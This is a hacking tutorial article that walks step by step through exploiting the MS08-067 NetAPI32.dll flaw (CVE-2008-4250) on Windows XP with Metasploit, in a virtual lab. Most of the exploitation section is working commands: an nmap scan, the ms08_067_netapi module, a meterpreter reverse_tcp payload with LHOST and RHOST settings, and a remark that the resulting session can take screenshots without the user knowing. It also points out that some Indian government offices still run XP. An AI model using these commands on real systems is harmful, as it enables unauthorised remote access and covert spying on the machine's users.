Exploiting NetAPI32.dll Using Metasploit
In this article of OP3N, we’re going to see how Windows XP machines can get hacked just by knowing their IP addresses. It should be noted, however, that there are only a few government offices in India that still utilize Windows XP due to lack of management in their software. I suggest that you do not go and look for offices to crack. Instead, let’s just go through hacking a Windows XP machine in a virtualized environment.
The thing is that neither anyone spending enough money on upgrading their software according to newer operating systems nor Microsoft is patching Windows XP anymore. So we’re left with an unpatched and vulnerable operating system.Now, enough with the details; you guys know this already. Let’s move on and see what we’re actually going to hack on a remote Win XP machine.There are numerous ways to exploit a Win XP machine, and today, we’re going to exploit the parsing flaw in the path canonicalization code of NetAPI32.dll by the server service, as defined in CVE-2008-4250.So, what exactly is a server service vulnerability? The servers of Microsoft Windows provide support for sharing resources, such as files and print services over a network. This service is vulnerable to a remote code execution, and NetAPI32.dll is the cause of this vulnerability. While we process a directory traversal character sequence in path names, there’s an error generated in NetAPI32.dll. The vulnerability could be exploited by corrupting stack memory. An example would be sending RPC requests that contain specially crafted path names to the server service component. The NetprPathCanonicalize() function in the NetAPI32.dll file gets affected. However, this vulnerability is not just in Windows XP; it is also in other operating systems. Other systems that could be exploited through this method are Windows 2000, Windows Server 2003, Windows Vista, and Win Server 2008.ExploitationSince I’m doing all this in a virtualized environment, I’ve created two virtual machines and installed Win XP on one and Kali Linux on the other. First of all, go to your Win XP machine and open the command prompt. Type ipconfig to identify the IP address of the vulnerable machine. For example, the IP address for my Win XP machine is 10.0.0.1. Fire up the Kali Linux machine and open a terminal. Inside the terminal, write the following command to get a list of all opened ports and the version of the operating system:
#nmap -O 10.0.0.1At this point, we’ve gathered a lot information, and now it’s time to fire up our metasploit! So go over to the terminal in Kali and type msfconsole. It’ll take a while to open up, and once it does, type in the search command to search for modules related to netapi:> search netapiThere, you’ll find the module exploit/windows/smb/ms08_067_netapi. This is the module that we’re going to use for our exploitation purposes. Start a meterpreter session before selecting the module to exploit the MS08-067 service:> set payload windows/meterpreter/reverse_tcp> use exploit/windows/smb/ms08_067_netapi> show optionsNow, set LHOST to 10.0.0.3 (IP of my Kali machine):> set LHOST 10.0.0.3Set RHOST to 10.0.0.1 (IP of my WinXP machine):> set RHOST 10.0.0.1Finally, type exploit to start the remote exploitation process. It’ll start a meterpreter session in between your Kali machine and Windows machine that will let you execute remote commands to the Win XP machine. For example, the command screenshot will let you take a screenshot of your target machine without letting the user working on that remote machine know about it.